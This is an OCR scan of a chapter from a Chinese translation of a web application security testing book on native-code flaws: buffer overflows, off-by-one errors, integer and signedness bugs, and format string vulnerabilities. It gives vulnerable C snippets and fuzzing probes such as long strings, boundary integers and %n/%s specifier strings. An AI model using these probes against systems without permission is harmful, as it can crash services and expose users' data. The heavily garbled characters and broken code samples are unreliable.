但 是 ， 有 时 也 会 遇 到 用 本 地 代码 编写 的 Web 应 用 程序 。 而 且 ,， 许多 主要 使 用 托管 代码 编写 的 
应 用 程序 同样 包含 本 地 代码 或 调用 在 非 托 管 环境 中 运行 的 外 部 组 件 。 除非 渗透 测试 员 确 切 地 知道 
所 针对 的 应 用 程序 并 不 包含 任何 本 地 代码 , 否则 就 有 必要 对 它 进行 一 些 基 本 的 检查 , 查 明 其 中 是 
人 盏 存在 任何 常见 的 汤 洞 。 
在 打印 机 与 交换 机 等 硬件 设备 上 运行 的 Web 应 用 程序 党 第 使 用 某 种 本 地 代码 。 其 他 可 能 的 目 
标 包 含 : 任何 其 名 称 ( 如 dll 或 exe ) 表示 它 使 用 了 本 地 代码 的 页 面 或 脚本 ， 以 及 任何 已 知 调用 踪 
留 外 部 组 件 的 功能 ( 如 日 志 机 制 ) 如 条 认 为 所 攻击 的 应 用 程序 包含 大 量 的 本 地 代码 ， 那 么 就 有 
必要 对 应 用 程序 处 理 的 每 个 用 户 提交 的 数据 进行 测试 ， 包 括 每 个 参数 的 名 称 与 参数 值 、cookie、 
请 求 消息 头 及 其 他 数据 。 
本 章 主要 介绍 3 种 典型 的 软件 漏洞 : 绥 冲 区 游 出 、 整 数 漏洞 和 格式 化 字符 串 漏 洞 。 对 每 一 种 
情况 ,我 们 将 首先 描述 一 些 第 见 的 汤 洞 ,然后 说 明 在 Web 应 用 程序 中 探查 这 些 着 洞 所 需 采 取 的 实 
际 步骤 。 这 个 主题 涉及 的 内 容 非常 三 ， 它 不 在 本 书 讨 论 的 范围 之 内 。 关 于 本 地 软件 漏洞 ， 要 想 了 
解 更 多 详细 信息 及 如 何 发 现 它 们 ， 我 们 推荐 以 下 参考 书 。 
DQ The Shellcoder’s Handbook, 2nd Edition, by Chris Anley, John Heasman, Felix Linder, and 
Gerardo Richarte (Wiley, 2007) 

D The Art of Software Security Assessment by Mark Dowd, John McDonald, and Justin Schuh 
(Addison-Wesley, 2000) 

DQ Gray Hat Hacking, 2nd Edition, by Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness 
(McGraw-Hill Osborne, 2008) 
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注解 ”本 章 描 述 的 漏洞 远程 探查 可 能 会 给 应 用 程序 带 来 严重 的 拒绝 服务 风险 。 与 验证 
机 制 不 完善 及 路 径 遍 历 等 漏洞 不 同 ， 仅 查找 各 种 典型 的 软件 漏洞 也 可 能 会 在 目标 应 用 





程序 中 造成 无 法 处 理 的 异常 ， 导 致 应 用 程序 终止 运行 。 如 果 准 备 在 一 个 现 有 的 应 用 程 
序 中 探查 这 些 漏 洞 ， 在 开始 测试 前 ， 必 须 确 保 应 用 程序 所 有 者 接受 测试 带 来 的 风险 。 


16.1 缓冲 区 溢出 漏洞 


如 打 应 用 程序 将 用 户 可 控制 的 数据 复制 到 一 个 不 足以 容纳 它们 的 内 存 缓存 区 中 , 就 会 出 现 绥 
冲 区 溢出 漏洞 。 由 于 目标 组 种 区 溢出 ， 导 致 邻 近 的 内 存 被 用 户 数据 重 写 。 攻 击 者 可 以 根据 漏洞 的 
守 点 利用 它 在 服务 融 上 运行 任意 代码 或 执行 其 他 未 授权 操作 。 多 年 来 , 缓冲 区 淤 出 漏洞 一 二 在 本 
地 软件 中 普 记 存在， 并 被 视 为 本 地 软件 开发 者 必须 避免 的 “头号 公 天 ”。 


16.1.1 栈 溢出 


如 果 应 用 程序 在 未 确定 大 小 固定 的 缕 冲 区 容量 足够 大 之 前 ， 就 使 用 一 个 无 限制 的 复制 操作 
( 如 C 语 言 中 的 strcpy ) 将 一 个 大 小 可 变 的 缓冲 区 复制 到 男 一 个 大 小 固定 的 缓冲 区 中 ， 往 往 就 会 
造成 缓冲 区 洪 出 。 例 如 ， 下 面 的 函数 将 字符 串 username 复 制 到 一 个 分 配 到 栈 上 的 大 小 固定 的 组 
冲 区 中 


bool CheckLogin (char* username, char* password 


{ 


























char username[32]; 


strcocpy!(_ username, usSername}): 


如 果 字 人 符 串 username 超 过 32 个 字 伯 ，_username 绥 冲 区 就 会 淤 出 ， 攻 击 者 将 重 写 邻 近 内 存 
中 的 数据 。 

在 成 功利 用 栈 缓冲 区 洲 出 漏洞 的 攻击 中 , 攻击 者 通常 能 够 重 写 栈 上 已 保存 的 返回 地 址 。 当 调 
用 checkLogin 图 数 时 ， 处 理 需 将 调用 吨 数 后 执行 的 指令 地 址 写 入 栈 。 结 束 checkLogin 上 数 后 ， 
处 理 需 从 栈 中 取出 这 个 地 址 ， 返 回执 行 这 个 指令 。 同 时 ，checkLogin 卫 数 分 配 到 栈 上 已 保存 的 
返回 地 址 劳 边 的 _username 绥 冲 区 。 如 果 攻 击 者 能 够 令 _username 绥 冲 区 溢出 ， 他 就 能 用 他 选 
择 的 一 个 值 重 写 缓冲 区 已 保存 的 返回 地 址 ， 让 处 理 需 访问 这 个 地 址 ， 从 而 执行 任意 代码 。 


16.1.2” 堆 溢出 


从 本 质 上 讲 , 堆 缓 冲 区 溢出 也 是 由 前 面 摘 述 的 相同 危险 操作 造成 的 , 唯一 的 不 同 在 于 这 时 洲 
出 的 目标 缓冲 区 分 配 在 堆 上 ， 而 不 是 在 栈 上 : 


bool CheckLogin (char* username, char* password 


| 








char* username = (char*)} malloc{(32); 


strcocpy!(_ username, usSername}): 





468 第 16 章 攻击 本 地 编译 型 应 用 程序 








通 稍 ,在 堆 绥 冲 区 洪 出 中 ， 目 标 缓冲 区 劳 不 是 已 保存 的 返回 地 址 ， 而 是 其 他 以 堆 控 制 结构 分 
隔 的 堆 内 存 块 。 堆 以 一 个 双 回 链接 表 的 形式 执行 : 在 内 存 中 ,每 个 块 的 前 面 是 一 个 控制 结构 ， 其 
中 包含 块 的 大 小 、 一 个 指向 堆 上 前 一 个 块 的 指针 以 及 一 个 指向 堆 上 后 一 个 块 的 指针 。 当 堆 绥 冲 区 
溢出 时 ， 邻 近 的 堆 块 的 控制 结构 被 用 户 控制 的 数据 重 写 。 

与 栈 江 出 泽 洞 相 比 ， 利 用 这 种 漏洞 实施 攻击 要 更 困难 一 些 , 但 是 , 一 种 常见 的 利用 方法 是 在 
被 重 与 的 堆 控 制 结构 中 与 人 专门 设计 的 值 ,以 在 将 来 录 个 时 间 重 与 任何 一 个 关键 的 指针 。 控 制 结 
构 已 被 重 与 的 堆 块 从 内 存 中 释放 后 ,， 堆 管理 如 需要 更 新 堆 块 的 链接 表 。 要 完成 这 项 任务 ， 它 需要 
更 新 后 一 个 堆 块 的 反 回 链 接 指针 , 并 更 新 前 一 个 堆 块 的 正 癌 链接 指针 ,以 便 链接 表 中 的 这 两 个 指 
针 指 癌 彼 此 。 为 此 , 堆 管 理 带 使 用 被 重 写 的 控制 结构 中 的 值 。 具体 来 说 ,为 更 新 后 一 个 块 的 反问 
链接 指针 , 堆 管 理 带 废 径 被 重 与 的 控制 结构 中 的 正 回 链 接 指针 ,并 在 这 个 地 址 的 结构 中 写 和 人 被 重 
写 的 控制 结构 中 的 反 办 链接 指针 的 值 。 换 句 话 说 , 它 在 一 个 用 户 控制 的 地 址 中 与 和 人 一 个 用 户 控制 
的 值 。 如 条 攻击 关 精 心 设计 了 他 的 洪 出 数据 ,他 就 能 用 他 选择 的 值 重 与 内 存 中 的 任何 指针 ， 其 目 
的 是 控制 指针 的 执行 路 径 ， 从 而 执行 任意 代码 。 通 笛 ， 指 针 重 写 的 主要 目标 是 随后 被 应 用 程序 调 
用 的 函数 指针 的 值 ， 或 者 是 在 下 次 出 现 异 第 时 被 调用 的 腊 肖 处 理 右 的 地 址 。 












































注解 ”了 新 的 编译 器 与 操作 系统 已 经 采取 了 各 种 措施 对 软件 进行 保护 ， 防 止 编程 错误 
导致 缓冲 区 洪 出 。 这 表示 ， 如 今 现 实 世 界 中 的 洪 出 漏洞 往往 比 这 里 描述 的 示例 更 难以 





利用 。 要 想 了 解 更 多 有 关 这 些 漏洞 的 防御 措施 及 避 开 它们 的 方法 ， 请 参阅 The 
Shellcoder x Handbook 一 书 。 





16.1.3 “一 位 偶 移 ”漏洞 


如 果 编 程 错误 使 得 攻击 者 可 以 在 一 个 被 分 配 的 缓冲 区 之 后 写 人 一 个 字 节 (或 少数 几 字 节 )， 
就 会 发 生 一 种 特殊 的 溢出 着 洞 。 

以 下 面 的 代码 为 例 , 它 在 栈 上 分 配 一 个 缓冲 区 ,执行 一 项 计数 缓冲 区 复制 操作 ,然后 以 空 字 
节 结 束 目标 字符 串 : 

bool CheckLogin (char* username, char* password,) 


{ 











char usernamel[32]: 


int 1; 

for {i = 0 username[i] && 1 < 32; I++) 
username[i] = usernamel[lil]: 

username[i] = 0; 


这 段 代 码 复 制 32 B， 然 后 增加 空 终 止 符 。 因 此 ， 如 果 用 户 名 为 32 B 或 更 长 ， 空 字 节 就 会 写 在 
缓冲 区 之 外 ,， “污染” 邻近 的 内 存 。 这 种 条 件 可 被 攻击 者 加 以 利用 : 如 果 栈 上 邻近 的 数据 是 调用 
由 ( calling frame ) 的 已 保存 的 帧 指针 ( saved frame pointer )， 那 么 将 低位 字 币 设 为 入 可 能 会 导致 
它 指向 _username 缓 冲 区 , 因而 指向 攻击 者 控制 的 数据 。 当 调用 的 函数 返回 时 ,攻击 者 就 可 以 控 
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制 执行 流程 。 

如 条 开发 者 忽略 在 字符 日 缓 冲 区 中 为 一 个 空 字 节 终止 符 预 留 空 间 , 这 时 也 会 出 现 一 种 与 上 面 
的 漏洞 类 似 的 漏洞 。 下 面 以 前 面 堆 溢 出 漏洞 的 “修复 ”代码 为 例 : 

bool CheckLogin (char* username, char* password,) 


{ 





char* username = (char*) malloc{(32): 
strncpy!( username, username, 32); 


在 这 段 代码 中 , 程序 员 在 堆 上 建立 一 个 固定 大 小 的 缓冲 区 , 然后 执行 一 个 计数 缓冲 区 复制 操 
作 ， 叶 在 确保 绥 冲 区 不 会 洲 出 。 然 而 ， 如 采用 户 名 比 缓冲 区 更 长 ,那么 缓冲 区 内 就 会 完全 填充 用 
户 名 中 的 字符 , 再 没有 空间 在 最 后 附加 一 个 空 学 方 。 因此, 复制 到 绥 冲 区 中 的 字符 串 就 会 “丢失 ” 
它 的 空 终止 符 。 

一 些 语言 (如 C ) 并 不 单独 记录 一 个 字符 串 的 长 度 ， 字 符 串 结束 部 分 用 一 个 空 学 市 表示 (也 
就 是 说 , 用 雪 的 ASCII 字 符 编 查 表示 )。 如 末 一 个 字符 串 “ 丢 失 ” 了 它 的 空 终止 符 ， 它 的 长 度 就 会 
增加 ， 卫 到 直到 内 存 中 下 一 个 空 学 节 为 止 。 这 种 无 意 的 结 采 经 常会 在 应 用 程序 中 造成 反常 行为 与 
漏洞 。 

我 们 曾 在 一 个 便 件 设备 的 Web 应 用 程序 中 发 现 这 种 漏洞 。 该 应 用 程序 包含 一 个 页 面 ， 它 接受 
POST 请 求 的 任意 参数 ,并 返回 HTML 表单 ,其 中 以 隐藏 字段 的 形式 包含 那些 参数 的 名 称 与 参数 值 。 
例如 : 


POST /formRelay.cgi HTTP/1.0 
Content-Length: 3 





























a=b 


HTTP/1.1 200 OK 

Date: THU, O01 SEP 2011 14:53:13 GMT 
Content-Type: text/html 
Content-Length: 278 


<html> 

<head> 

<meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> 
</head> 

<form name="FORM RELAY" action='"'page.cgi" method="POST"> 

<input type="hidden" name="a" value="b"> 

</form> 

<body onLoad="document .FORM RELAY.Submit();"> 

</body> 

</html> 


因为 某 种 原因 , 整个 应 用 程序 都 需要 使 用 这 个 页 面 处 理 各 种 用 户 输入 ,其 中 许多 为 敏感 数据 。 
然而 ， 如 采用 户 提交 的 数据 等 于 或 超过 4096 B, 那么 返回 的 表单 中 还 包括 在 回 页 面 提出 的 前 一 个 
请 求 中 提交 的 参数 ， 即 使 这 些 参数 由 为 外 一 名 用 户 提 交 。 例 如 : 
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POST /formRelay.cgi HTTP/1.0 
Content-Length: 4096 


a=bbbbbbbbbbbbbliliots more b's) 


HTTP/1.1] 200 OK 

Date: THU, O01 SEP 2011 14:58:31 GMT 
Content-Type: text/html 
Content-Length: 4598 


<html> 


<head> 





<meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> 
</head> 

<form name="FORM RELAY" action="page.cgli" method="POST"> 

<input type="hidden" name="a" value="bbbbbbbbbbbbb[lots more b's] "> 
<input type="hidden" name="strUsername" value="agriffiths"> 


<input type="hidden" name="strPassword" value=-"aufwiedersehen"> 





<input type="hidden’" name="Log_in”" value="Log+In"> 

0 

</body> 

</html> 

确定 这 种 源 洞 后 ,我 们 就 可 以 继续 癌 这 个 易 受 攻击 的 页 面 提交 超 长 的 数据 ,解析 收 到 的 啊 应 ， 
记录 其 他 用 户 提 交 给 页 面 的 每 一 个 数据 ， 包 括 登 录 证 书 和 其 他 敏感 信息 。 

造成 这 种 漏洞 的 根本 原因 是 ,在 4096 B 的 内 存 块 中 ， 用户 提 交 的 数据 被 保存 为 以 空 字 市 终止 
的 字符 串 。 这 些 数据 在 一 个 检验 操作 中 被 复制 ， 因 此 不 会 百 接 造成 溢出 。 然 而 ， 如 宁 提 交 的 是 超 
长 的 输入 ， 复 制 操作 就 会 导致 空 终 止 侍 “丢失 “， 因 而 字符 果 会 “流入 ”到 内 存 邻 近 的 数据 中 。 
因此 ， 当 应 用 程序 解析 请 求 参 数 时 ， 它 会 一 直 解 析 到 下 一 个 空 学 市 为 止 , 因此 束 会 解析 出 其 他 用 
户 提交 的 参数 。 


16.1.4 ”查找 缓冲 区 浇 出 漏洞 


























问 一 个 确定 的 目标 发 送 较 长 的 字符 串 并 监控 反常 结果 是 查找 缓冲 区 洪 出 漏洞 的 基本 方法 。 有 
些 时 候 , 一 些 细微 的 漏洞 上 共有 通过 发 送 一 个 特殊 长 度 或 者 在 较 小 的 长 度 范 围 内 的 超 长 字符 串 才 能 
检测 出 来 。 但 是 , 许多 时 候 ， 只 需 回 应 用 程序 发 送 一 个 超出 其 预计 长 度 的 字符 串 ， 就 可 以 探查 出 
漏洞 。 

程序 员 常 常 使 用 十 进 制 或 十 六 进 制 的 约 整数 ( 如 32、100、1024、4096 等 ) 来 创建 固定 大 小 
的 缓冲 区 。 在 应 用 程序 中 探查 明显 漏洞 的 一 个 简单 方法 就 是 , 癌 确 定 的 每 一 个 目标 数据 发 送 超 长 
字符 串 ， 然 后 监控 服务 器 对 反常 输入 的 啊 应 。 
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渗透 测试 步 又 


(1) 问 每 一 个 目标 数据 提交 一 系列 稍 大 于 第 用 缓冲 区 大 小 的 长 子 符 串 。 例 如 : 


1100 
4200 
33000 


(2) 一 次 针对 一 个 数据 实施 攻击 ， 最 大 程度 地 和 窗 庆 应 用 程序 中 的 所 有 代码 路 人 笃 。 

(3) 可 以 使 用 Burp Intruder 中 的 字符 块 有 效 载 位 来 源 日 动 生成 各 种 大 小 的 有 效 载 何 。 

(4) 监控 应 用 程序 的 咽 应 ， 确 定 所 有 反 第 现象 。 无 法 控制 的 溢出 几乎 可 以 肯定 会 在 应 用 程 
序 中 引起 异 弟 。 在 远程 进程 中 探测 何 时 出 现 这 种 寞 第 相当 困难 , 需要 寻找 的 反 第 现象 包括 以 下 
几 项 。 














口 HTTP 500 状 态 码 或 错误 消息 , 这 时 其 他 畸形 ( 而 非 超 长 ) 输 入 不 会 产生 相同 的 结 
口 内 容 详细 的 消息 ， 表 示 某 个 本 地 代码 组 件 发 生 故 障 。 
口 服务 需 收 到 一 个 局 部 或 畸形 啊 应 。 
口 服务 需 的 TCP 连接 未 返回 响应 ， 突 然 关 闭 。 
口 整个 Web 应 用 程序 停止 响应 。 
(5) 注意 ， 如 果 一 个 堆 溢 出 被 触发 ， 这 可 能 会 在 将 来 而 非 立 即 导 致 系统 朋 沉 。 因 此 ， 必 须 
进行 实验 ,确定 一 种 或 几 种 造成 堆 “ 腐 化 ”的 测试 字符 串 。 
(6) “一 位 偏 移 ” 漏 洞 可 能 不 会 造成 系统 朋 江 ,但 可 能 会 导致 反常 行为 ， 如 应 用 程序 返回 
意外 的 数据 。 

















有 些 时 候 ， 测 试 字符 串 可 能 会 被 应 用 程序 自身 或 其 他 组 件 ( 如 Web 服 务 右 ) 实施 的 输入 确认 
检查 所 阻止 。 在 URL 查 询 字 符 串 中 提交 超 长 数据 时 通常 会 出 现 这 种 情况 ,应 用 程序 会 在 针对 每 个 
测试 字符 串 的 啊 应 中 以 “URL 过 长 ”之 类 的 稼 规 消 息 反 映 这 一 点 。 在 这 种 情况 下 , 应当 进行 实验 ， 
确定 URL 人 允许 的 最 大 长 度 (一 般 约 为 2000 个 字符 )， 并 调整 缓冲 区 大 小 ， 以 使 测试 字符 串 符 合 这 
个 要 求 。 但 是 ， 即 使 实施 了 常规 过 小 ,溢出 可 能 依然 存在 ; 因为 长 度 足 够 短 、 能 够 避 开 这 种 过 滤 
的 字符 串 也 可 能 触发 淤 出 。 

其 他 情况 下 ,过滤 机 制 可 能 会 限制 在 一 个 特定 参数 中 提交 的 数据 类 型 或 字符 范围 。 例 如 ， 当 
将 提交 的 用 户 名 传送 给 一 个 包含 洪 出 漏洞 的 功能 时 , 应 用 程序 可 能 会 确认 该 用 户 名 是 否 仅 包含 字 
母 数字 字符 。 为 实现 测试 效率 最 大 化 , 渗透 测试 员 应 当 设法 确保 每 个 测试 字符 串 仅 包含 相关 参数 
允许 的 字符 。 满 足 这 种 要 求 的 一 个 有 效 方法 是 ,截获 一 个 包含 应 用 程序 所 接受 的 数据 的 正常 请 求 ， 
然后 使 用 其 中 已 经 包含 的 相同 类 型 的 字符 ， 创 建 一 个 可 能 通过 任何 基于 内 容 的 过 滤 的 长 字符 串 ， 
再 使 用 这 个 字符 串 轮流 测试 每 一 个 目标 参数 。 

即使 确信 应 用 程序 中 存在 缓冲 区 洲 出 漏洞 ,但 是 ,要 远程 利用 它 执行 任意 代码 仍然 极其 困难 。 
NGSSoftware 公 司 的 Peter WinterSmith 束 育 目 组 种 区 溢出 利用 的 可 能 性 进行 了 一 些 有 趣 的 研究 。 
欲 知 详情 ， 请 参阅 以 下 内 容 : www.ngssoftware.com/papers/NISR.BlindExploitation.pdf。 
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16.2 ”整数 漏洞 


如 末 应 用 程序 在 执行 某 种 缓冲 区 操作 前 对 一 个 长 度 值 进行 算术 运算 , 但 却 没 有 考虑 到 编译 兹 
与 处 理 天 整数 计算 方面 的 一 些 特点 , 往往 就 会 出 现 与 整数 有 关 的 疡 洞 。 有 两 种 类 型 的 疡 洞 最 值得 
关注 : 整数 溢出 与 从 号 错误 。 











16.2.1 整数 溢出 


当 对 一 个 整数 值 进行 操作 时 ,如 果 整 数 大 于 它 的 最 大 可 能 值 或 小 于 它 的 最 小 可 能 值 ， 就 会 造 
成 整数 溢出 源 洞 。 这 时 ， 数 子 就 会 “ 回 缉 "使 一 个 非常 大 的 数字 变 得 非常 小， 或 者 与 之 相反 。 

下 面 以 前 面 堆 淤 出 着 洞 的 “修复 ”代码 为 例 : 

bool CheckLogin{char* username, char* password) 


{ 














unsigned Short len = strlen{(username) + 1; 
char* username = (char*) malloc{(len):;: 
stropy!(_ username, usSername}: 











在 这 段 代 码 中 , 应 用 程序 求 出 用 户 提交 的 用 户 名 的 长 度 , 增加 一 个 长 度 安置 字符 串 最 后 的 空 
字 节 ， 再 给 它 分 配 一 个 相应 长 度 的 缓冲 区 ， 然 后 将 用 户 名 复制 到 这 个 绥 冲 区 内 。 如 果 使 用 正常 长 
度 的 输入 ， 这 段 代 码 就 能 够 正常 运行 。 但 是 ， 如 果 用 户 提 交 一 个 65 535 个 字符 的 用 户 名 ， 就 会 造 
成 整数 洲 出 。 一 个 snort 类 型 的 整数 包含 16 位 ， 它 足以 保存 0~65 535 之 间 的 值 。 如 果 提 交 一 个 长 
度 为 65 535 的 字符 串 ， 程 序 会 在 这 个 长 度 值 上 加 1， 使 得 这 个 值 “ 回 绕 ” 而 变 为 0。 于 是 应 用 程序 
为 它 分 配 一 个 长 度 为 0 的 缓冲 区 ， 把 用 户 名 复制 到 它 里 面 ， 因 而 造成 堆 淤 出。 这样， 即使 程序 员 
试图 确保 目标 缓冲 区 足够 大 ， 攻 击 者 仍然 能 够 制造 溢出 。 




















16.2.2 ”符号 错误 








如 末 应 用 程序 使 用 有 符号 和 无 从 号 的 整数 来 表示 绥 冲 区 的 长 度 , 并 且 在 东 个 地 方 混 消 这 两 个 
整数 , 或 者 将 一 个 有 和 从 号 的 值 与 无 人 特写 的 值 进行 直接 比较 , 或 者 问 一 个 仅 接 受 无 符号 的 值 的 函数 
参数 提交 有 符号 的 值 ， 都 会 出 现 符 号 错误 。 在 上 述 两 种 情况 下 ， 有 符号 的 值 都 会 被 当做 其 对 应 的 
无 特写 的 值 处 理 ， 也 就 是 说 ， 一 个 负数 变 成 一 个 大 正 数 。 

下 面 以 前 面 栈 淤 出 沁 洞 的 修复 “代码 ”为 例 : 

bool CheckLogin(char* username, int len, char* password, 


| 























char username[32] = ""; 
if (len < 32) 
strncpy(_username, username, len); 
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在 这 上 段 代码 中 ,函数 以 用 户 提交 的 用 户 名 和 一 个 表示 其 长 度 的 有 符号 整数 为 参数 。 程序 员 在 
栈 上 建立 一 个 固定 大 小 的 缓冲 区 ,检查 用 户 名 的 长 度 是 否 小 于 缓冲 区 的 大 小 ， 如 果 是 这 样 ， 就 执 
行 计数 绥 冲 区 复制 ， 确 保 绥 冲 区 不 会 溢出 。 

如 果 1len 参 数 为 正 数 ， 这 上段 代码 就 能 够 正常 运行 。 然 而 ， 如 果 攻 击 者 能 够 回 子 数 提交 一 个 钠 
值 , 那么 程序 员 的 保护 性 检查 就 会 失效 。 仍然 可 以 成 功 将 它 与 32 进 行 比较 ,因为 编译 右 会 把 这 两 
个 数字 当做 有 符号 的 整数 人 处理。 因此 ， 这 个 负 值 被 提交 给 strncpy 函 数 ， 成 为 它 的 计数 函数 。 因 
为 stzrncpy 仅 接受 无 符号 的 整数 为 参数 ， 所 以 编译 需 将 1en 值 隐 含 地 转换 成 这 种 类 型 ;因而 负 值 
被 当做 一 个 大 的 正 数 处 理 。 如 采用 户 提 交 的 用 户 名 字符 串 长 度 大 于 32 B， 那 么 缓冲 区 就 会 淤 出 ， 
这 种 情况 和 标准 栈 溢出 类 似 。 

通 铝 ， 实 施 这 种 攻击 必须 满足 一 个 前 提 ， 即 长 度 参 数 由 攻击 者 直接 欣 制 。 例 如 ， 它 由 客户 端 
JavaScript 计 算 ， 并 在 请 求 中 将 它 所 属 的 字符 串 一 起 提交 。 但 是 ， 如 果 整 数 变 量 足 够 小 〈 例 如 ， 
short 类 型 的 整数 )， 且 程序 在 服务 硕 端 计算 它 的 长 度 ， 那 么 攻击 者 仍然 可 以 通过 回应 用 程序 提 
交 一 个 超 长 的 字符 串 ， 借 由 整数 溢出 引入 一 个 负 值 。 


16.2.3 ”查找 整数 漏洞 


自然 地 , 任何 时 候 , 只 要 客户 端 癌 服务 右 提 交 整 数值 , 我 们 就 可 以 在 这 些 位 置 探 查 整 数 漏洞 。 

通常 这 种 行为 发 生 在 以 下 两 种 不 同 的 情况 下 。 

口 应 用 程序 通过 查询 字符 串 参 数 、cookie 或 消息 主体 ， 以 正常 形式 提交 整数 值 。 这 些 数字 一 
般 使 用 标准 的 ASCII 字符 ， 以 十 进 制 表示 。 这 时 ， 表 示 一 个 同样 被 提交 的 字符 串 长 度 的 
字段 是 我 们 测试 的 主要 目标 。 

口 男 外 ， 应 用 程序 可 能 提交 舱 入 到 二 进 制 数 据 巨 对 象 中 的 整数 值 。 这 些 数 据 可 能 源 自 一 个 
客户 端 组 件 ， 如 ActiveX 控 件 ， 或 者 通过 客户 端 在 隐藏 表 单字 段 或 cookie 中 传送 ( 请 参阅 
第 5 草 了 解 相关 内 容 )。 在 这 种 情况 下 ， 与 长 度 有 关 的 整数 漏洞 更 难以 发 现 。 它 们 一 般 以 
十 六 进 制 的 形式 表示 ， 通 常 出 现在 与 其 关联 的 字符 串 或 缓冲 区 之 前 。 请 注意 ， 上 述 二 进 
制 数 据 可 能 会 通过 Base64 或 类 似 的 方案 编码 ， 以 便于 通过 HTTP 传 送 。 















































渗透 测试 步 又 





(1) 确定 测试 目标 后 ， 需 要 提交 适当 的 有 效 载 傈 ， 以 触发 任何 漏洞 。 轮 流 问 每 一 个 目标 数 
据 发 送 一 系列 不 同 的 值 ， 分 别 表示 不 同 有 符号 与 无 符号 整数 值 的 边界 情况 。 例 如 : 

口 0x7f 与 0x80 ( 127 与 128 ) 

口 0xff 与 0x100 (255$ 与 256 ) 

口 0x7ffff 与 0x8000 (32 767 与 32 768 ) 

口 0xffff 与 0x10000 ( 65 535 与 65 536) 

口 0x7ffffffF 与 0x80000000 (2 147 483 647 与 2 147 483 648 ) 

口 0xffffffff 与 0x0 (4 294 967 295 与 0 ) 
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(2) 如 果 被 修改 的 数据 以 十 六 进 制 表示 ， 应 该 发 送 每 个 测试 字符 串 的 little-endian 与 
big-endian 版 本 "， 例 如 ，ff7f 及 7fff。 如 果 十 六 进 制 数 字 以 ASCII 形 式 提交 ， 应 该 使 用 应 用 程序 
目 身 使 用 的 字母 字符 ， 确 保 这 些 字 符 被 正确 编码 。 

(3) 与 上 述 查 找 缓 冲 区 溢出 漏洞 时 一 样 ， 应 该 监控 应 用 程序 响应 中 出 现 的 反常 事件 。 




















16.3 ”格式 化 字 付 串 漏 洞 


如 采用 户 可 控制 的 输入 被 当做 格式 化 字符 串 参 数 提交 给 一 个 接受 可 能 被 滥用 的 格式 说 明 符 
的 函数 《如 C 语 言 中 的 printf 系 列 函 数 )， 束 会 产生 格式 化 字符 串 汤 洞 。 这 些 孙 数 接受 的 参数 数 
量 不 定 ， 其 中 可 能 包含 不 同 的 数据 类 型 ， 如 数字 和 字符 串 。 提 交 给 函数 的 格式 化 字符 串 中 包含 的 
说 明 符 告诉 函数 ， 变量 参数 中 应 包含 何 种 数据 ， 以 及 这 些 数据 以 什么 格式 表示 。 

例如 ， 下 面 的 代码 输出 一 条 包含 以 十 进 制 表示 的 count 变 量 值 的 消息 : 

Printf ("The value of count is %Sd", count ) : 

最 危险 的 格式 说 明 符 为 sn。 这 个 说 明 符 不 会 导致 什么 数据 被 打印 。 相 反 , 它 使 已 经 输出 的 字 
廊 数 量 被 写 入 到 以 相关 变量 参数 提交 给 孙 数 的 指针 地 址 中 。 例 如 : 


int count = 43: 











int written = 0; 
printf ("The value of count is Sd%n.\n", count, &written ) : 


printf("%d bytes were printed.\n", written); 


它 答 出 : 


The value of count is 43. 
24 bytes were printed. 


如 有 果 格 式 化 字符 串 中 的 说 明 符 比 提交 给 函数 的 个 数 可 变 的 参数 多 , 而 函数 又 无 法 探查 到 这 一 
点 ， 那 么 它 就 会 继续 处 理 调用 栈 中 的 参数 。 

如 条 攻 击 者 能 够 控制 提交 给 printf 之 类 函数 的 全 部 或 部 分 格式 化 字符 串 ， 他 就 可 以 利用 上 
述 行为 重 写 进 程 内 存 的 重要 部 分 ,并 最 终 执行 任意 代码 。 由 于 攻击 者 控制 着 格式 化 字符 串 ,， 所 以 
他 能 够 控制 函数 输出 的 字 节 数量 以 及 栈 上 被 输入 的 字 市 数量 重 写 的 指针 。 这 样 , 攻击 者 就 能 够 重 
写 一 个 已 保存 的 返回 地 址 或 者 一 个 指 问 异 常 处 理 右 的 指针 ,进而 控制 代码 执行 , 就 像 在 栈 溢出 中 
一 样 。 


查找 格式 化 字符 串 漏洞 
在 远程 应 用 程序 中 探查 格式 化 字符 串 漏 洞 的 最 有 效 方法 是 ， 提 区 包含 各 种 格式 说 明 符 的 数 





























CO big-endian 和 1little-endian 是 用 来 表述 一 组 有 序 的 字 节 数 存放 在 计算 机 内 存 中 时 的 顺序 的 术语 。big-endian 是 将 高 位 字 节 ( 序 
列 中 最 重要 的 值 ) 先 存放 在 高 地 址 处 的 顺序 ， 而 litttle-endian 是 将 低位 字 节 (序列 中 最 不 重要 的 值 ) 先 存放 在 低地 址 处 的 
顺序 。 一 一 译 者 注 
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据 ， 并 监控 应 用 程序 的 任何 反常 行为 。 与 不 受 控制 地 触发 缀 冲 区 溢出 汤 洞 可 能 造成 的 后 末 一 样 ， 
在 一 个 易 受 攻击 的 应 用 程序 中 探查 格式 化 字符 串 涯 洞 可 能 会 导致 系统 月 洪 。 











渗透 测试 步 又 
(1) 轮流 回 每 个 目标 参数 提交 包含 大 量 格式 化 说 明 符 sn 与 ss 的 字符 串 : 


OO OO OO EO OO OO OO OO OG 
TNsnsnsnsnsnsnsnsnsnsnsnsnsnsnnsnsnsnsn 





STSSTSSTSTSSTSSTSTSSTSSTSSTSSTSSTSSSSTSTSSSSSSTS SS 

注意 ， 基 于 安全 考虑 ， 一 些 格式 化 字符 串 操 作 可 能 会 忽略 $n 说 明 符 。 相 反 ， 提 交 %s 说 明 
符 将 会 使 函数 废弃 栈 上 的 每 一 个 参数 ， 如 果 应 用 程序 易于 受到 攻击 ， 就 可 能 会 叶 致 非法 访问 。 

(2) Windows FormatMessage 捕 数 以 一 种 不 同 的 方式 使 用 printf 系 列 函数 中 的 说 明 符 。 
为 测试 调用 这 个 函数 是 否 易于 受到 攻击 ， 应 该 使 用 以 下 字符 串 : 


攻 1 1 闪 ! 和 2 1 有 1 和 31 了 1 省 4 有 1 和 省 D 有 和 6 省 7 1 省 8 1 省 9 1 攻 10InL etc... 








lls!%2!s!%3!s!%4!s!%5!s!%6!Ss!%$/7/!s!%8!s!%9!s!%$10!s! etc... 
(3) 记得 将 % 字 符 URL 编 但 成 sg25。 
(4) 与 上 述 查 找 绥 冲 区 淤 出 漏洞 时 一 样 ， 应 该 监控 应 用 程序 啊 应 中 出 现 的 反 第 事件 。 





16.4 ”小 结 


